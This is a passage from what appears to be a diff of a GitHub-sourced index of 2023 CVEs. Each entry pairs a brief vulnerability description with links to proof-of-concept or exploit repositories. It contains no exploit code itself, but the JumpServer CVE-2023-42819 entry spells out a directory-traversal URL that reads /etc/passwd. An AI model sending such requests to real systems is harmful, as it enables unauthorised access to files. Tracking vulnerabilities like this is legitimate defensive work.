group_categorias functions. + + +- [MinoTauro2020/CVE-2023-40869](https://github.com/MinoTauro2020/CVE-2023-40869) + +### CVE-2023-40924 (2023-09-08) + +SolarView Compact < 6.00 is vulnerable to Directory Traversal. + + +- [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924) + +### CVE-2023-40930 (2023-09-20) + +An issue in the directory /system/bin/blkid of Skyworth v3.0 allows attackers to perform a directory traversal via mounting the Udisk to /mnt/. + + +- [NSnidie/CVE-2023-40930](https://github.com/NSnidie/CVE-2023-40930) + +### CVE-2023-40931 (2023-09-19) + +A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php + + +- [sealldeveloper/CVE-2023-40931-PoC](https://github.com/sealldeveloper/CVE-2023-40931-PoC) +- [datboi6942/Nagios-XI-s-CVE-2023-40931-Exploit](https://github.com/datboi6942/Nagios-XI-s-CVE-2023-40931-Exploit) + +### CVE-2023-40933 (2023-09-19) + +A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function. + + +- [sealldeveloper/CVE-2023-40933-PoC](https://github.com/sealldeveloper/CVE-2023-40933-PoC) + +### CVE-2023-40989 (2023-09-22) + +SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component. + + +- [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989) + +### CVE-2023-41064 (2023-09-07) + +A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. + + +- [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064) +- [MrR0b0t19/CVE-2023-41064](https://github.com/MrR0b0t19/CVE-2023-41064) +- [sarsaeroth/CVE-2023-41064-POC](https://github.com/sarsaeroth/CVE-2023-41064-POC) + +### CVE-2023-41080 (2023-08-25) + +URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.\n\nThe vulnerability is limited to the ROOT (default) web application. + + +- [shiomiyan/CVE-2023-41080](https://github.com/shiomiyan/CVE-2023-41080) + +### CVE-2023-41265 (2023-08-29) + +An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13. + + +- [praetorian-inc/zeroqlik-detect](https://github.com/praetorian-inc/zeroqlik-detect) + +### CVE-2023-41362 (2023-08-29) + +MyBB before 1.8.36 allows Code Injection by users with certain high privileges. Templates in Admin CP intentionally use eval, and there was some validation of the input to eval, but type juggling interfered with this when using PCRE within PHP. + + +- [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE) + +### CVE-2023-41425 (2023-11-07) + +Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component. + + +- [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425) +- [charlesgargasson/CVE-2023-41425](https://github.com/charlesgargasson/CVE-2023-41425) +- [insomnia-jacob/CVE-2023-41425](https://github.com/insomnia-jacob/CVE-2023-41425) +- [SpycioKon/CVE-2023-41425](https://github.com/SpycioKon/CVE-2023-41425) +- [thefizzyfish/CVE-2023-41425-wonderCMS_RCE](https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE) +- [Raffli-Dev/CVE-2023-41425](https://github.com/Raffli-Dev/CVE-2023-41425) +- [duck-sec/CVE-2023-41425](https://github.com/duck-sec/CVE-2023-41425) +- [0xDTC/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425](https://github.com/0xDTC/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425) +- [h3athen/CVE-2023-41425](https://github.com/h3athen/CVE-2023-41425) +- [Diegomjx/CVE-2023-41425-WonderCMS-Authenticated-RCE](https://github.com/Diegomjx/CVE-2023-41425-WonderCMS-Authenticated-RCE) +- [0x0d3ad/CVE-2023-41425](https://github.com/0x0d3ad/CVE-2023-41425) +- [xpltive/CVE-2023-41425](https://github.com/xpltive/CVE-2023-41425) +- [samu21req/CVE-2023-41425](https://github.com/samu21req/CVE-2023-41425) + +### CVE-2023-41436 (2023-09-15) + +Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component. + + +- [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content) + +### CVE-2023-41474 (2024-01-25) + +Directory Traversal vulnerability in Ivanti Avalanche 6.3.4.153 allows a remote authenticated attacker to obtain sensitive information via the javax.faces.resource component. + + +- [JBalanza/CVE-2023-41474](https://github.com/JBalanza/CVE-2023-41474) + +### CVE-2023-41507 (2023-09-05) + +Super Store Finder v3.6 was discovered to contain multiple SQL injection vulnerabilities in the store locator component via the products, distance, lat, and lng parameters. + + +- [redblueteam/CVE-2023-41507](https://github.com/redblueteam/CVE-2023-41507) + +### CVE-2023-41508 (2023-09-05) + +A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel. + + +- [redblueteam/CVE-2023-41508](https://github.com/redblueteam/CVE-2023-41508) + +### CVE-2023-41533 +- [Sh33talUmath/CVE-2023-41533](https://github.com/Sh33talUmath/CVE-2023-41533) + +### CVE-2023-41534 +- [Sh33talUmath/CVE-2023-41534](https://github.com/Sh33talUmath/CVE-2023-41534) + +### CVE-2023-41535 +- [Sh33talUmath/CVE-2023-41535](https://github.com/Sh33talUmath/CVE-2023-41535) + +### CVE-2023-41564 (2023-09-08) + +An arbitrary file upload vulnerability in the Upload Asset function of Cockpit CMS v2.6.3 allows attackers to execute arbitrary code via uploading a crafted .shtml file. + + +- [sota70/cve-2023-41564-research](https://github.com/sota70/cve-2023-41564-research) + +### CVE-2023-41575 (2023-09-08) + +Multiple stored cross-site scripting (XSS) vulnerabilities in /bbdms/sign-up.php of Blood Bank & Donor Management v2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Full Name, Message, or Address parameters. + + +- [SoundarXploit/Stored-xss](https://github.com/SoundarXploit/Stored-xss) + +### CVE-2023-41592 (2023-09-14) + +Froala Editor v4.0.1 to v4.1.1 was discovered to contain a cross-site scripting (XSS) vulnerability. + + +- [miguelc49/CVE-2023-41592-2](https://github.com/miguelc49/CVE-2023-41592-2) +- [miguelc49/CVE-2023-41592-1](https://github.com/miguelc49/CVE-2023-41592-1) +- [miguelc49/CVE-2023-41592-3](https://github.com/miguelc49/CVE-2023-41592-3) + +### CVE-2023-41593 (2023-09-11) + +Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters. + + +- [MATRIXDEVIL/CVE](https://github.com/MATRIXDEVIL/CVE) + +### CVE-2023-41613 (2023-12-04) + +EzViz Studio v2.2.0 is vulnerable to DLL hijacking. + + +- [Eafz/cve-2023-41613](https://github.com/Eafz/cve-2023-41613) + +### CVE-2023-41623 (2023-12-12) + +Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php. + + +- [GhostBalladw/wuhaozhe-s-CVE](https://github.com/GhostBalladw/wuhaozhe-s-CVE) + +### CVE-2023-41646 (2023-09-07) + +Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/ + + +- [tristao-marinho/CVE-2023-41646](https://github.com/tristao-marinho/CVE-2023-41646) + +### CVE-2023-41652 (2023-11-03) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n + + +- [RandomRobbieBF/CVE-2023-41652](https://github.com/RandomRobbieBF/CVE-2023-41652) + +### CVE-2023-41717 (2023-08-31) + +Inappropriate file type control in Zscaler Proxy versions 3.6.1.25 and prior allows local attackers to bypass file download/upload restrictions. + + +- [federella/CVE-2023-41717](https://github.com/federella/CVE-2023-41717) + +### CVE-2023-41772 (2023-10-10) + +Win32k Elevation of Privilege Vulnerability + + +- [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772) + +### CVE-2023-41892 (2023-09-13) + +Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15. + + +- [zaenhaxor/CVE-2023-41892](https://github.com/zaenhaxor/CVE-2023-41892) +- [0xfalafel/CraftCMS_CVE-2023-41892](https://github.com/0xfalafel/CraftCMS_CVE-2023-41892) +- [diegaccio/Craft-CMS-Exploit](https://github.com/diegaccio/Craft-CMS-Exploit) +- [acesoyeo/CVE-2023-41892](https://github.com/acesoyeo/CVE-2023-41892) +- [CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892](https://github.com/CERTologists/HTTP-Request-for-PHP-object-injection-attack-on-CVE-2023-41892) + +### CVE-2023-41991 (2023-09-21) + +A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7. + + +- [Zenyith/CVE-2023-41991](https://github.com/Zenyith/CVE-2023-41991) + +### CVE-2023-41993 (2023-09-21) + +The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7. + + +- [po6ix/POC-for-CVE-2023-41993](https://github.com/po6ix/POC-for-CVE-2023-41993) +- [hrtowii/cve-2023-41993-test](https://github.com/hrtowii/cve-2023-41993-test) +- [0x06060606/CVE-2023-41993](https://github.com/0x06060606/CVE-2023-41993) +- [Mangaia/cve-test](https://github.com/Mangaia/cve-test) +- [J3Ss0u/CVE-2023-41993](https://github.com/J3Ss0u/CVE-2023-41993) + +### CVE-2023-42115 (2024-05-03) + +Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the smtp service, which listens on TCP port 25 by default. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of a buffer. An attacker can leverage this vulnerability to execute code in the context of the service account.\n. Was ZDI-CAN-17434. + + +- [kirinse/cve-2023-42115](https://github.com/kirinse/cve-2023-42115) +- [AdaHop-Cyber-Security/Pocy](https://github.com/AdaHop-Cyber-Security/Pocy) + +### CVE-2023-42222 (2023-09-28) + +WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. + + +- [itssixtyn3in/CVE-2023-42222](https://github.com/itssixtyn3in/CVE-2023-42222) + +### CVE-2023-42283 (2023-11-07) + +Blind SQL injection in api_id parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. + + +- [andreysanyuk/CVE-2023-42283](https://github.com/andreysanyuk/CVE-2023-42283) + +### CVE-2023-42284 (2023-11-07) + +Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query. + + +- [andreysanyuk/CVE-2023-42284](https://github.com/andreysanyuk/CVE-2023-42284) + +### CVE-2023-42326 (2023-11-14) + +An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components. + + +- [bl4ckarch/CVE-2023-42326](https://github.com/bl4ckarch/CVE-2023-42326) + +### CVE-2023-42362 (2023-09-14) + +An arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file. + + +- [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362) + +### CVE-2023-42413 +- [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413) + +### CVE-2023-42426 (2023-09-25) + +Cross-site scripting (XSS) vulnerability in Froala Froala Editor v.4.1.1 allows remote attackers to execute arbitrary code via the 'Insert link' parameter in the 'Insert Image' component. + + +- [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426) + +### CVE-2023-42442 (2023-09-15) + +JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n + + +- [HolyGu/CVE-2023-42442](https://github.com/HolyGu/CVE-2023-42442) +- [tarihub/blackjump](https://github.com/tarihub/blackjump) +- [C1ph3rX13/CVE-2023-42442](https://github.com/C1ph3rX13/CVE-2023-42442) + +### CVE-2023-42468 (2023-09-13) + +The com.cutestudio.colordialer application through 2.1.8-2 for Android allows a remote attacker to initiate phone calls without user consent, because of improper export of the com.cutestudio.dialer.activities.DialerActivity component. A third-party application (without any permissions) can craft an intent targeting com.cutestudio.dialer.activities.DialerActivity via the android.intent.action.CALL action in conjunction with a tel: URI, thereby placing a phone call. + + +- [actuator/com.cutestudio.colordialer](https://github.com/actuator/com.cutestudio.colordialer) + +### CVE-2023-42469 (2023-09-13) + +The com.full.dialer.top.secure.encrypted application through 1.0.1 for Android enables any installed application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.full.dialer.top.secure.encrypted.activities.DialerActivity component. + + +- [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted) + +### CVE-2023-42470 (2023-09-11) + +The Imou Life com.mm.android.smartlifeiot application through 6.8.0 for Android allows Remote Code Execution via a crafted intent to an exported component. This relates to the com.mm.android.easy4ip.MainActivity activity. JavaScript execution is enabled in the WebView, and direct web content loading occurs. + + +- [actuator/imou](https://github.com/actuator/imou) + +### CVE-2023-42471 (2023-09-11) + +The wave.ai.browser application through 1.0.35 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. It contains a manifest entry that exports the wave.ai.browser.ui.splash.SplashScreen activity. This activity uses a WebView component to display web content and doesn't adequately validate or sanitize the URI or any extra data passed in the intent by a third party application (with no permissions). + + +- [actuator/wave.ai.browser](https://github.com/actuator/wave.ai.browser) + +### CVE-2023-42789 (2024-03-12) + +A out-of-bounds write in Fortinet FortiOS 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, FortiProxy 7.4.0, 7.2.0 through 7.2.6, 7.0.0 through 7.0.12, 2.0.0 through 2.0.13 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests. + + +- [jhonnybonny/CVE-2023-42789](https://github.com/jhonnybonny/CVE-2023-42789) + +### CVE-2023-42793 (2023-09-19) + +In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible + + +- [H454NSec/CVE-2023-42793](https://github.com/H454NSec/CVE-2023-42793) +- [whoamins/CVE-2023-42793](https://github.com/whoamins/CVE-2023-42793) +- [Zenmovie/CVE-2023-42793](https://github.com/Zenmovie/CVE-2023-42793) +- [johnossawy/CVE-2023-42793_POC](https://github.com/johnossawy/CVE-2023-42793_POC) +- [StanleyJobsonAU/GhostTown](https://github.com/StanleyJobsonAU/GhostTown) +- [hotplugin0x01/CVE-2023-42793](https://github.com/hotplugin0x01/CVE-2023-42793) +- [Zyad-Elsayed/CVE-2023-42793](https://github.com/Zyad-Elsayed/CVE-2023-42793) +- [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793) +- [HusenjanDev/CVE-2023-42793](https://github.com/HusenjanDev/CVE-2023-42793) +- [FlojBoj/CVE-2023-42793](https://github.com/FlojBoj/CVE-2023-42793) +- [SwiftSecur/teamcity-exploit-cve-2023-42793](https://github.com/SwiftSecur/teamcity-exploit-cve-2023-42793) + +### CVE-2023-42819 (2023-09-26) + +JumpServer is an open source bastion host. Logged-in users can access and modify the contents of any file on the system. A user can use the 'Job-Template' menu and create a playbook named 'test'. Get the playbook id from the detail page, like 'e0adabef-c38f-492d-bd92-832bacc3df5f'. An attacker can exploit the directory traversal flaw using the provided URL to access and retrieve the contents of the file. `https://jumpserver-ip/api/v1/ops/playbook/e0adabef-c38f-492d-bd92-832bacc3df5f/file/?key=../../../../../../../etc/passwd` a similar method to modify the file content is also present. This issue has been addressed in version 3.6.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n + + +- [C1ph3rX13/CVE-2023-42819](https://github.com/C1ph3rX13/CVE-2023-42819) + +### CVE-2023-42820 (2023-09-26) + +JumpServer is an open source bastion host. This vulnerability is due to exposing the random number seed to the API, potentially allowing the randomly generated verification codes to be replayed, which could lead to password resets. If MFA is enabled users are not affect. Users not using local authentication are also not affected. Users are advised to upgrade to either version 2.28.19 or to 3.6.5. There are no known workarounds or this issue. + + +- [C1ph3rX13/CVE-2023-42820](https://github.com/C1ph3rX13/CVE-2023-42820) +- [Startr4ck/cve-2023-42820](https://github.com/Startr4ck/cve-2023-42820) + +### CVE-2023-42860 (2024-02-21) + +A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to modify protected parts of the file system. + + +- [Trigii/CVE-2023-42860](https://github.com/Trigii/CVE-2023-42860) + +### CVE-2023-42931 (2024-03-28) + +The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication. + + +- [d0rb/CVE-2023-42931](https://github.com/d0rb/CVE-2023-42931) + +### CVE-2023-43040 (2024-05-13) + +IBM Spectrum Fusion HCI 2.5.2 through 2.7.2 could allow an attacker to perform unauthorized actions in RGW for Ceph due to improper bucket access. IBM X-Force ID: 266807. + + +- [riza/CVE-2023-43040](https://github.com/riza/CVE-2023-43040) + +### CVE-2023-43115 (2023-09-18) + +In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. NOTE: it is a documented risk that the IJS server can be specified on a gs command line (the IJS device inherently must execute a command to start the IJS server). + + +- [jostaub/ghostscript-CVE-2023-43115](https://github.com/jostaub/ghostscript-CVE-2023-43115) + +### CVE-2023-43144 (2023-09-22) + +Projectworldsl Assets-management-system-in-php 1.0 is vulnerable to SQL Injection via the "id" parameter in delete.php. + + +- [Pegasus0xx/CVE-2023-43144](https://github.com/Pegasus0xx/CVE-2023-43144) + +### CVE-2023-43147 (2023-10-12) + +PHPJabbers Limo Booking Software 1.0 is vulnerable to Cross Site Request Forgery (CSRF) to add an admin user via the Add Users Function, aka an index.php?controller=pjAdminUsers&action=pjActionCreate URI. + + +- [MinoTauro2020/CVE-2023-43147](https://github.com/MinoTauro2020/CVE-2023-43147) + +### CVE-2023-43148 (2023-10-12) + +SPA-Cart 1.9.0.3 has a Cross Site Request Forgery (CSRF) vulnerability that allows a remote attacker to delete all accounts. + + +- [MinoTauro2020/CVE-2023-43148](https://github.com/MinoTauro2020/CVE-2023-43148) + +### CVE-2023-43149 (2023-10-12) + +SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status. + + +- [MinoTauro2020/CVE-2023-43149](https://github.com/MinoTauro2020/CVE-2023-43149) + +### CVE-2023-43154 (2023-09-26) + +In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account. + + +- [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC) + +### CVE-2023-43177 (2023-11-17) + +CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. + + +- [the-emmons/CVE-2023-43177](https://github.com/the-emmons/CVE-2023-43177) + +### CVE-2023-43208 (2023-10-26) + +NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679. + + +- [K3ysTr0K3R/CVE-2023-43208-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) +- [jakabakos/CVE-2023-43208-mirth-connect-rce-poc](https://github.com/jakabakos/CVE-2023-43208-mirth-connect-rce-poc) +- [J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT](https://github.com/J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT) +- [Avento/CVE-2023-43208_Detection_PoC](https://github.com/Avento/CVE-2023-43208_Detection_PoC) + +### CVE-2023-43261 (2023-10-04) + +An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components. + + +- [win3zz/CVE-2023-43261](https://github.com/win3zz/CVE-2023-43261) + +### CVE-2023-43263 (2023-09-26) + +A Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component. + + +- [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263) + +### CVE-2023-43284 (2023-10-05) + +D-Link Wireless MU-MIMO Gigabit AC1200 Router DIR-846 100A53DBR-Retail devices allow an authenticated remote attacker to execute arbitrary code via an unspecified manipulation of the QoS POST parameter. + + +- [MateusTesser/CVE-2023-43284](https://github.com/MateusTesser/CVE-2023-43284) + +### CVE-2023-43317 (2024-01-24) + +An issue in Coign CRM Portal v.06.06 allows a remote attacker to escalate privileges via the userPermissionsList parameter in Session Storage component. + + +- [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317) + +### CVE-2023-43318 (2024-03-05) + +TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests. + + +- [str2ver/CVE-2023-43318](https://github.com/str2ver/CVE-2023-43318) + +### CVE-2023-43323 (2023-09-28) + +mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink]. + + +- [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323) + +### CVE-2023-43325 (2023-09-25) + +A reflected cross-site scripting (XSS) vulnerability in the data[redirect_url] parameter of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL. + + +- [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325) + +### CVE-2023-43326 (2023-09-25) + +A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL. + + +- [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326) + +### CVE-2023-43339 (2023-09-25) + +Cross-Site Scripting (XSS) vulnerability in cmsmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload injected into the Database Name, DataBase User or Database Port components. + + +- [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation) + +### CVE-2023-43340 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in evolution v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected into the cmsadmin, cmsadminemail, cmspassword and cmspasswordconfim parameters + + +- [sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options](https://github.com/sromanhu/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options) + +### CVE-2023-43341 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter. + + +- [sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-](https://github.com/sromanhu/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-) + +### CVE-2023-43342 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component. + + +- [sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend](https://github.com/sromanhu/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend) + +### CVE-2023-43343 (2023-10-05) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Files - Description parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files](https://github.com/sromanhu/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files) + +### CVE-2023-43344 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description](https://github.com/sromanhu/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description) + +### CVE-2023-43345 (2023-10-19) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Content - Name parameter in the Pages Menu component. + + +- [sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content) + +### CVE-2023-43346 (2023-10-20) + +Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component. + + +- [sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend](https://github.com/sromanhu/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend) + +### CVE-2023-43352 (2023-10-26) + +An issue in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted payload to the Content Manager Menu component. + + +- [sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content](https://github.com/sromanhu/CVE-2023-43352-CMSmadesimple-SSTI--Content) + +### CVE-2023-43353 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component. + + +- [sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra](https://github.com/sromanhu/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra) + +### CVE-2023-43354 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component. + + +- [sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension](https://github.com/sromanhu/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension) + +### CVE-2023-43355 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component. + + +- [sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user](https://github.com/sromanhu/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user) + +### CVE-2023-43356 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component. + + +- [sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings](https://github.com/sromanhu/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings) + +### CVE-2023-43357 (2023-10-20) + +Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component. + + +- [sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut](https://github.com/sromanhu/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut) + +### CVE-2023-43358 (2023-10-23) + +Cross 